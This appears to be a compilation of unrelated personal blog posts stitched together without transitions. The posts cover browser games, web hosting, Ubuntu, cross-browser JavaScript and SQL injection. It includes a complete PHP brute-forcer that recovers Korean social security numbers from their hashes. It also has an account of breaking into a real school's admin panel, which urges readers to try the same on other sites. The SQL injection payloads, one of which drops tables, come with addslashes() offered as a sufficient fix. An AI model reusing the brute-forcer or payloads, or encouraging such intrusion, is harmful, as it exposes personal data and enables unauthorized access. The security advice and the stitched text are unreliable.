There are many browser-based game, which are most of the time strategic simulation games. These kind of games don’t have too many graphics and consists of mostly static images, but they’re addictive beyond normal games. I’ve recently started one called Tribal Wars, and I’m already addicted to it (before this, I was addicted to o-game) They’re both similar games where you attack, farm, get resources, build stuff, and so on; but their settings are very different. The reason these so-called browser-based games are so addictive is because you don’t play them for hours in a row, but you just access your page for a few minutes whenever you find time. The game lasts for a LONG time: until you get tired of it, or your village gets demolished.

Some people might call these games pointless and an absolute waste of time, but it’s actually fun. You have to have strategy and think a bit. You engage wars with other players and learn to work together with other people. Communication also becomes an important factor once you start engaging wars in groups such as tribes or clans.

The joy of getting resources, gaining points, constructing buildings, attacking, and taking over are felt when playing these games. It’s like warcraft or other simulation games except you play for days, months, or even years. These games are also updated consistantly, and your neighbors develop as well. It might depend on who you are, but these games are so addictive you won’t be able to stop playing and will be attached to your village/planet or whatever you own on the game you play.

This is another one of the scripts I wrote quite a while ago. It just wrote it out of pure boredom and actually got somewhere. Korean social securyity numbers have a pattern, consisting of 13 digits segmented into 2 parts of 6 and 7 digits. The first part is like this.

The second part is a bit complicated. It hold information on your gender and which region of Korea you were registered from. The gender codes are 9 for male 0 for female if you were born in the 1800s, 1 and 2 for the 1900s and 3 and 4 for the 2000s. The regional codes are complicated so I’ll pass on that.

The check number is generated by a pattern. The following PHP code calculates it.

function get_check_no($s_no){
　unset($total);
　　
　for($i=0; $i<13; $i++){
　　$s_no[$i] = intval($s_no[$i]); // convert to integer
　}
　
　// calculate social security number
　$total = $s_no[0]*2 + $s_no[1]*3 + $s_no[2]*4 + $s_no[3]*5 + $s_no[4]*6 + $s_no[5]*7 + $s_no[6]*8 + $s_no[7]*9 + $s_no[8]*2 + $s_no[9]*3 + $s_no[10]*4 + $s_no[11]*5;
　$total = $total%11;
　$check_no = 11-$total;
　
　// if the value of the check number exceeds 9, divide by 10 and return remainder
　if($check_no>9){
　　$check_no = $check_no % 10;
　}
　
　return $check_no; // return result
}

So I created the bruteforcer by simply letting someone enter a hash, birthdate, and gender to get a general idea of what the SSN will look like. Then I simply incremented the leftover digits and calcultated the check numbers. I then hashed them and checked them with the entered hash value.

<?php
$b_year = $_POST['b_year'];
$b_month = $_POST['b_month'];
$b_day = $_POST['b_day'];
$gender = $_POST['gender'];
$s_no_hash_str = $_POST['s_no_hash_str'];
$hash_type = $_POST['hash_type'];
// error messages
if(!$b_year){
　echo “* Enter birth year<br />”;
}
if(!$b_month){
　echo “* Enter birth month<br />”;
}
if(!$b_day){
　echo “* Enter birth day<br />”;
}
if(!$gender){
　echo “* Select gender<br />”;
}
if(!$s_no_hash_str){
　echo “* Enter hashed SSN.<br />”;
}
if(!$hash_type){
　echo “* Select hash type<br />”;
}
// if everything is entered, start processing.
if($b_year && $b_month && $b_day && $gender && $hash_type && $s_no_hash_str){
// pad valued with 0
$b_year = str_pad($b_year, 4, ‘19′, STR_PAD_LEFT);
$b_month = str_pad($b_month, 2, ‘0′, STR_PAD_LEFT);
$b_day = str_pad($b_day, 2, ‘0′, STR_PAD_LEFT);
$b_year_det = substr($b_year,0,2);
$b_year = substr($b_year,2,2);
if($b_year_det == “18″){
　if($gender == “1″){
　　$gender = “9″;
　}
　else{
　　$gender = “0″;
　}
}
else if($b_year_det == “19″){
　if($gender == “1″){
　　$gender = “1″;
　}
　else{
　　$gender = “2″;
　}
}
else if($b_year_det == “20″){
　if($gender == “1″){
　　$gender = “3″;
　}
　else{
　　$gender = “4″;
　}
}
// loop misc
for($misc=0;$misc<=99999;$misc++){
　// pad misc
　$misc = str_pad($misc, 5, ‘0′, STR_PAD_LEFT); // pad left with 0’s
　
　// merge valued to form actual s s no
　$s_no_1 = $b_year.$b_month.$b_day;
　$s_no_2 = $gender.$misc;
　
　// get full number including check number
　$s_no_string = $s_no_1.$s_no_2.get_check_no($s_no_1.$s_no_2);
　
　// select hash type and convert
　if($hash_type == “md5″){
　　$s_no_hash = md5($s_no_string);
　}
　else if($hash_type == “sha1″){
　　$s_no_hash = sha1($s_no_string);
　}
　// if the hash matches the processed, return the value and break loop
　if($s_no_hash == $s_no_hash_str){
　　echo ”
　　Done: “.$s_no_string.”(”.$s_no_hash.”)
　　<script type=\”text/javascript\”>
　
　　<!–
　　document.getElementById(’result’).innerHTML = ‘”.$s_no_string.”‘;
　　//–>
　　</script>
　　”;
　　break;
　}
　// if not… just print current value and continue
　else{
　　echo “Processing: “.$s_no_string.”(”.$s_no_hash.”)<br />”;
　}
}
}
?>

Source Code:

<?php
$links = $_POST['links']; // get links from POST
$links = explode(”\n”,$_POST['links']); // explode links
$z = 0;
$filesize = array(); // define array
while($z <= count($links) -1){ // while $z is smaller than the number of links
　$html = $links[$z]; // store link into var
　$html = @file_get_contents($html); // get contents of link
　preg_match(”/\(<b>(.*)<\/b> KB\)/i”,$html,$matches); // pregmatch to get the filesize
　$filesize[$z] = $matches[1]; // store filesize in array
　if(!$filesize[$z]){ // if filesize doesn’t exist
　　$filesize[$z] = 0; // define as zero
　　$links[$z] = $links[$z].” DEAD”; // define as DEAD
　}
　$z++;
}
$filesize[total] = array_sum($filesize); // add all filesized
$filesize[unit] = “KB”; // default unit is KB
if($filesize[total] >= 1024){ // If is more than 1024 KB
　$filesize[total] /= 1024; // divide value with 1024
　$filesize[unit] = “MB”; // define as MB
　if($filesize[total] >= 1024){ // if value it bigger than 1024 again
　　$filesize[total] /= 1024; // divide by 1024 again
　　$filesize[unit] = “GB”; // and define as GB
　}
}
?>
…
<?php
$i = 0;
while($i <= count($links) -1){ // while $i is smaller than the number of links
　 echo $links[$i].” (<b>”.$filesize[$i].”</b>)<br />”; // print them
　 $i++;
}
echo “<b>Total</b>: “.round($filesize[total],2).$filesize[unit]; // print total filesize
?>

The screen-shot on the left is the login form of an administrator panel of a school. I’ve entered a typical SQL injection expression. Let’s see what happens. (Simple SQL injection is explained here)

It actually let me login as admin! I mean, I know programmers can make mistakes and school don’t always hire good programmers, but they should at least try to keep their students’ private data safe. Their whole school data could be erased by a malicious kid who just happened to try SQL injection on their site. A student of that school could even edit his or her own grades, change their own attendance, and lower the grades of someone they don’t like.

I’ve tried this with many other sites and a large portion of them failed to escape characters and allowed me to trick the script into logging me in, usually as an administrator. If you run a site with a custom-built script, you should check for this very simple but critical vulnerability. Who knows, maybe your own school’s administrator panel has this vulnerability.

Although this can turn out to be very chaotic, it actually takes less than a line of code to remedy it. In PHP, the addslashes() function can be used to escape all characters. One function, that’s all it takes to prevent people from viewing your administrative data and mess around with your site. Check some admin panel logins and try this method, a surprising number of them will fall for this trick and you’ll be granted administrator power and be granted to do whatever you want with that site (of course, if you’re caught you’d be sentenced to cyber crime and thus be screwed).

Go around and check. Tell your friend about a security hole in his site (or possible pull a prank first). Tell your school, organization, and just see their reaction. Just be careful not to bug the school administrator too much or you might get in trouble.

A related and funny comic strip (for those of you who know SQL)

The source is as it was when I used it except I removed my hosting details, adsense, and analytics sources. Don’t hesitate to ask or comment through the guestbook or by just commenting on this post.

Info

• Programming languages used: PHP, Javascript
• PHP Classes used: PEAR HTTP
• Languages available: Korean, Japanese, French, German, English, Polish, Chinese
• Requirements
• Server must support PHP
• Server must support MySQL, or delete the DB related sources
• Server must have URL fopen enabled
• Once again: it won’t work out of the box

Download 1

Download 2

Internet Explorer is still the mainstream browser, but you can see that Firefox is also dominant. In addition, despite having a relatively smaller number of users, Opera and Safari are also a significant segment of the statistics. This table shows the importance of cross-browser coding and web standards.

The first step of following web standards is reading the W3C XHTML recommendations. I suggest using the XHTML Transitional DTD since the Strict DTD is literally strict. A DTD is a Document Type Definition and it basically defines the regulations of web standards and is used to validate your XHTML code. Then you can start validation your websites using the W3C Validator to check whether the document is valid in the DTD you chose.

The second step is to learn how to code your JavasScript to work in all browsers. JavaScript can be scripted to be cross-browser multiple ways, but the most widely used method is by using the try and catch method. The following is an example of a cross-browser AJAX object initialization.

try{
　　// Firefox, Opera 8.0+, Safari, IE7
　　ajaxReq = new XMLHttpRequest();
　　}catch(error){
　　　　// IE5, IE6
　　　　try{
　　　　　　ajaxReq = new ActiveXObject("Msxml2.XMLHTTP");
　　　　　　}catch(error){
　　　　　　　　try{
　　　　　　　　　　ajaxReq = new ActiveXObject("Microsoft.XMLHTTP");
　　　　　　　　　　}catch(error){
　　　　　　　　　　　　return false;
　　　　　　　　　　}
　　　　　　　　}
　　　　　　}
　　　　}
　　}
}

This script tries a method and if an error occurs it detects it and executes the code within the catch expression. There can be a try expression within a catch expression and thus a cross-browser script can be coded this way.

To successfully code in cross-browser format, you should learn what functions or properties are IE or Firefox specific and avoid using them. Web standards are cross-browser coding are becoming more important by the second, so it’s to your benefit to get used to them as apply them when you’re coding.

The most significant change is the customer service. Hostican is just absolutely good at handling their customers. They have a ticket system (which most hosting services do), but they reply very fast and send you emails that confirm that your ticket has been submitted. Their phone service is also nice, they pick up quickly and give you friendly replies that actually help. But one of the new things I see is their support over chat. They have a chat window on their website which you can use to gain support, Although the engine itself could use a bit more tweaking, I personally thought it was a great Idea.

The hosting plan I got was their tera-host plan. It has unlimited bandwidth and 1TB of storage. At $93.40 it was a bargain. I used a coupon which was “BestHosting-12″ and that gave me a $50 discount. But before you barge in and try to host a relatively large site, you might want to consider that they are probably overselling. Hosting companies have thousands of customers and giving 1TB to each customer is one hard-drive per person. The following table is the sidebar on cPanel.

Main Domain	flixey.com
Home Directory	-
Last login from	-
Disk Space Usage	34.88/1000000 MB
Monthly Bandwidth Transfer	82.52/∞ MB
Email Accounts	1/∞
Subdomains	3/∞
Parked Domains	0/∞
Addon Domains	2/∞
Ftp Accounts	5/∞
SQL Databases	1/∞
Hosting package	Tera-Host
Server Name	esc12
cPanel Version	11.18.3-RELEASE
cPanel Build	21703
Theme	x3
Apache version	2.2.8 (Unix)
PHP version	5.2.5
MySQL version	5.0.45-community
Architecture	i686
Operating system	Linux
Shared Ip Address	-
Path to sendmail	/usr/sbin/sendmail
Path to PERL	/usr/bin/perl
Kernel version	2.6.9-67.0.4.ELsmp
cPanel Pro	1.0 (RC1)

The cPanel is good, but it doesn’t have the greated system for domain management. What is does is it creates a subdomain for each “add-on domain” and creates a folder within the root folder of your primary domain. Thus, you can access “domain2.com” from “http://domain.com/domain2.com.” I managed to prevent this by using .htaccess rules and a few tricks, but it is quite troublesome.

Another thing I like about this hosting is that it’s pretty flexible. The permissions aren’t totally locked and you can change it but not go above 755. The directory indexing is open at first so you have to close it with an .htaccess file (of course this isn’t too good).

Overall, I’m very pleased with what I have experienced with hostican so far. The strongest pro is their customer support which really helps when you need to know something or get something fixed. Of course I only bought it yesterday and have not experienced everything yet. But I still find it a great hosting and don’t think I’ll run into any huge problems. If you’re interested, you can visit their website.

Windows is what you’re probably using now. It’s the world’s most renown operating system. Most people now are still using Windows XP but alot of people have already upgraded to Windows Vista. Everyone knows about it, so I’ll just pass here.

When you compare Ubuntu and Windows, Ubuntu is probably better. However, the most major problem is: Ubuntu doesn’t have much software! First of all, for those who have iPods, Ubuntu is nearly hell–especially if you have the new iPod Nano, Classic, or Touch. There are iPod management application for Ubuntu, but they’re not as good as iTunes for actually managing your iPod. It’s difficult to set up your libraries and play lists, videos don’t work most of the time, and Pod Casts aren’t sorted as Pod Casts. OK, if you have the skills, sure, you might get this to work. But it’s really time consuming and you need to know alot about computers before you can.

Another con about Ubuntu is it doesn’t suspend or hibernate properly on certain laptops. There are fixes for this but even those stop working sometimes.

Although Ubuntu might be a bit hard to set up and doesn’t have so much compatability, it’s generally a very good OS. It’s just that not many people use it as much as Windows XP and so there’s not much software for it.

When you use Ubuntu, you’ll feel like your flying–no blue screens of death, no unexpected freezes (ok, some), and generally it gives you a really smooth workspace.

If you want to use Ubuntu, but need to use Windows for certain tasks, you can try dual booting. Before you try this, search for partitioning and see if your motherboard/BIOS supports it.

[Show as slideshow]

if(mysql_query("SELECT * FROM member_tables WHERE id = '".$login_id."' and password = '".$password."'")){
[...code for login...]
}

If quotes aren’t stripped from the variables $login_id or $password, a malicious user can inject SQL functions. They could login as the first user, in most cases the administrator, by typing in something like this into either of the two variables:

s' or 1=1 --

The one line can be catastrophic to a website’s security. If the quote isn’t filtered, the script will read the code like this

if(mysql_query("SELECT * FROM member_tables WHERE id = 's' or 1=1 --' and password = '[password]‘)){
[...code for login...]
}

The or statement makes it so even if only one condition matches, it will return a true value and execute the script. Since 1=1 is always true, the script will launch no matter what. The rest of the SQL statements are commented out by the two dashes (–). Is this the end? Nope.. If the security of the site is so weak, some one could easily delete all the members from the database. It’s just like the one above, but you add a bit of code and do a bit of guesswork.

s' or 1=1;DROP TABLE member_table; --

This would render this in the script

if(mysql_query("SELECT * FROM member_tables WHERE id = 's' or 1=1;DROP TABLES member_table; -- --' and password = '[password]‘)){
[...code for login...]
}

That just deletes the table. End, unless you have backup.

As devastating as this can be, it’s also very simple to prevent. You simply escape or remove quotes from a query using a built in function. In the case of PHP, the addslashes() function does the trick. So, the script above should be fixed to

$login_id = addslashes($login_id);
$password = addslashes($password);
if(mysql_query("SELECT * FROM member_tables WHERE id = '".$login_id."' and password = '".$password."'")){
[...code for login...]
}

This function adds backslashes (\) before metacharacters which lets the character be treated as just a string and not a special one that affects the acting of the query.